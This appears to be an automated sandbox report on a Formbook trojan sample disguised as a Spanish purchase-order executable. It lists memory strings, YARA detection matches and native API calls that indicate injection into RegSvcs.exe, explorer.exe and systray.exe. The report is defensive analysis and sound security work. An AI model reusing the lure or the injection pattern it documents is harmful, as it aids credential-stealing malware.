          Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: awselb/2.0 | Date: Wed, 03 Jul 2024 16:34:18 GMT | Content-Type: text/html | Content-Length: 118 | Connection: close | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a | Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
          Source: explorer.exe, 0000000A.00000002.4554886834.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2162129240.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3075767239.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2984822872.00000000099AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
          Source: explorer.exe, 0000000A.00000000.2168253854.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4557583157.000000000BFDF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 0000000A.00000002.4554376951.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2162129240.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 0000000A.00000002.4554376951.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2162129240.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/I
          Source: explorer.exe, 0000000A.00000000.2162129240.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4554376951.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 0000000A.00000002.4554376951.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2162129240.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2162129240.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4554376951.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 0000000A.00000000.2162129240.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4554376951.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
          Source: explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
          Source: explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
          Source: explorer.exe, 0000000A.00000000.2168253854.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4557583157.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com-
          Source: explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
          Source: explorer.exe, 0000000A.00000000.2168253854.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4557583157.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.come
          Source: explorer.exe, 0000000A.00000000.2168253854.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4557583157.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comEMd
          Source: explorer.exe, 0000000A.00000002.4559537776.00000000113AF000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 0000000E.00000002.4550643558.000000000556F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://status.squarespace.com
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 0000000A.00000002.4554886834.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2162129240.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3075767239.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2984822872.00000000099AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/e
          Source: explorer.exe, 0000000A.00000000.2168253854.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4557583157.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comM
          Source: Orden de compra 0307AR24.exe, RggSaCWUvAyNK.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed

E-Banking Fraud

Source: Yara match | File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000015.00000002.2320893127.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.4549121578.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.4549613061.00000000046E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.4549675658.0000000004710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2239061216.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2165242288.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.2320893127.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000015.00000002.2320893127.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.2320893127.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.4559239704.000000001048C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: 0000000E.00000002.4549121578.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000E.00000002.4549121578.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.4549121578.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.4549613061.00000000046E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000E.00000002.4549613061.00000000046E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.4549613061.00000000046E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.4549675658.0000000004710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000E.00000002.4549675658.0000000004710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.4549675658.0000000004710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.2239061216.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.2239061216.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.2239061216.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2165242288.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2165242288.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.2165242288.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Orden de compra 0307AR24.exe PID: 2572, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 7232, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR | Matched rule: Semi-Auto-generated - file ironshell.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: Process Memory Space: RggSaCWUvAyNK.exe PID: 7360, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: systray.exe PID: 7508, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: rundll32.exe PID: 7796, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.Orden de compra 0307AR24.exe.2dcbbd8.0.raw.unpack, -Module-.cs | Large array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
Source: 0.2.Orden de compra 0307AR24.exe.8f00000.5.raw.unpack, -Module-.cs | Large array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
Source: 11.2.RggSaCWUvAyNK.exe.2adbbb0.0.raw.unpack, -Module-.cs | Large array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0041A360 NtCreateFile,9_2_0041A360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0041A410 NtReadFile,9_2_0041A410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0041A490 NtClose,9_2_0041A490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0041A540 NtAllocateVirtualMemory,9_2_0041A540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0041A35B NtCreateFile,9_2_0041A35B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0041A3B2 NtCreateFile,9_2_0041A3B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0041A40A NtReadFile,9_2_0041A40A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0041A48B NtClose,9_2_0041A48B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_018A2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_018A2BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_018A2B60 NtClose,LdrInitializeThunk,9_2_018A2B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_018A2AD0 NtReadFile,LdrInitializeThunk,9_2_018A2AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_018A2DD0 NtDelayExecution,LdrInitializeThunk,9_2_018A2DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_018A2DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_018A2DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_018A2D10 NtMapViewOfSection,LdrInitializeThunk,9_2_018A2D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_018A2D30 NtUnmapViewOfSection,LdrInitializeThunk,9_2_018A2D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_018A2CA0 NtQueryInformationToken,LdrInitializeThunk,9_2_018A2CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_018A2C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_018A2C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_018A2F90 NtProtectVirtualMemory,LdrInitializeThunk,9_2_018A2F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_018A2FB0 NtResumeThread,LdrInitializeThunk,9_2_018A2FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_018A2FE0 NtCreateFile,LdrInitializeThunk,9_2_018A2FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_018A2F30 NtCreateSection,LdrInitializeThunk,9_2_018A2F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_018A2E80 NtReadVirtualMemory,LdrInitializeThunk,9_2_018A2E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_018A2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,9_2_018A2EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_018A4340 NtSetContextThread,9_2_018A4340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_018A4650 NtSuspendThread,9_2_018A4650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_018A2B80 NtQueryInformationFile,9_2_018A2B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_018A2BA0 NtEnumerateValueKey,9_2_018A2BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_018A2BE0 NtQueryValueKey,9_2_018A2BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_018A2AB0 NtWaitForSingleObject,9_2_018A2AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_018A2AF0 NtWriteFile,9_2_018A2AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_018A2DB0 NtEnumerateKey,9_2_018A2DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_018A2D00 NtSetInformationFile,9_2_018A2D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_018A2CC0 NtQueryVirtualMemory,9_2_018A2CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_018A2CF0 NtOpenProcess,9_2_018A2CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_018A2C00 NtQueryInformationProcess,9_2_018A2C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_018A2C60 NtCreateKey,9_2_018A2C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_018A2FA0 NtQuerySection,9_2_018A2FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_018A2F60 NtCreateProcessEx,9_2_018A2F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_018A2EE0 NtQueueApcThread,9_2_018A2EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_018A2E30 NtWriteVirtualMemory,9_2_018A2E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_018A3090 NtSetValueKey,9_2_018A3090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_018A3010 NtOpenDirectoryObject,9_2_018A3010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_018A35C0 NtCreateMutant,9_2_018A35C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_018A39B0 NtGetContextThread,9_2_018A39B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_018A3D10 NtOpenProcessToken,9_2_018A3D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_018A3D70 NtOpenThread,9_2_018A3D70
Source: C:\Windows\explorer.exe | Code function: 10_2_10475E12 NtProtectVirtualMemory,10_2_10475E12
Source: C:\Windows\explorer.exe | Code function: 10_2_10474232 NtCreateFile,10_2_10474232
Source: C:\Windows\explorer.exe | Code function: 10_2_10475E0A NtProtectVirtualMemory,10_2_10475E0A
Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04BA2CA0 NtQueryInformationToken,LdrInitializeThunk,14_2_04BA2CA0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04BA2C70 NtFreeVirtualMemory,LdrInitializeThunk,14_2_04BA2C70
Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04BA2C60 NtCreateKey,LdrInitializeThunk,14_2_04BA2C60
Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04BA2DF0 NtQuerySystemInformation,LdrInitializeThunk,14_2_04BA2DF0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04BA2DD0 NtDelayExecution,LdrInitializeThunk,14_2_04BA2DD0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04BA2D10 NtMapViewOfSection,LdrInitializeThunk,14_2_04BA2D10
Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04BA2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,14_2_04BA2EA0
